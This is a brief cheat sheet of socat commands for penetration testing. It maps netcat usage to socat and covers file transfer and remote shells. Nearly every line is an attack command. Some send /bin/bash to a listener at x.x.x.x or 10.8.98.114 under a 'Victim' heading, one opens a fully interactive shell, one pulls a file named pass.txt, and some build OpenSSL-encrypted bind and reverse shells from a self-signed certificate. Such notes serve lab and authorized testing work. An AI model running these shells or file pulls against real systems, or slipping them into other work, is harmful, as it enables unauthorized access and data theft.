### socat ###


##############
## nc/socat ##
##############
socat - TCP4:x.x.x.x:80		// nc x.x.x.x 80
socat TCP4-LISTEN:4444 STDOUT	// nc -lnvp 4444

socat TCP4-LISTEN:4444,fork file:pass.txt					# wait and send a file
socat TCP4:x.x.x.x:4444 file:pass.txt,create					# get the file

socat -d -d TCP4-LISTEN:4444 STDOUT						# wait a shell with -d debug
socat TCP4:x.x.x.x:4444 EXEC:/bin/bash						# send a shell


#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.8.98.114:4444


###################
## crypted socat ##
###################
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 30 -out shell.crt	# gen certificate
cat shell.key shell.crt > shell.pem							# create pem file
sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0,fork EXEC:/bin/bash		# encrypted bind shell
socat - OPENSSL:192.168.22.31:443,verify=0						# connect to shell

socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork STDOUT				# wait a connection
socat OPENSSL:192.168.22.31:4444,verify=0 EXEC:/bin/bash				# send the shell















